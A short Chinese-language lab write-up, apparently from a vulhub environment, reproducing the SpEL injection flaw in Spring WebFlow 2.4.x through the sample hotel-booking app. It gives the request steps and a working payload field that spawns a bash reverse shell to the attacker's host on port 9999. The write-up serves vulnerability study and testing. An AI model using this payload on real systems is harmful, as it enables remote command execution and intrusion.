漏洞简介
Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。
漏洞复现
首先访问http://your-ip:8080/login,用页面左边给出的任意一个账号/密码登录系统,然后访问id为1的酒店http://your-ip:8080/hotels/1,点击预订按钮Book Hotel,填写相关信息后点击Process,再点击确认Confirm,在这里抓包,向其中添加一个字段,字段内写入反弹shell的POC:
_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/your_ip/9999 0>&1")).start()=vulhub
注意URL编码!
返回监听查看:
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。
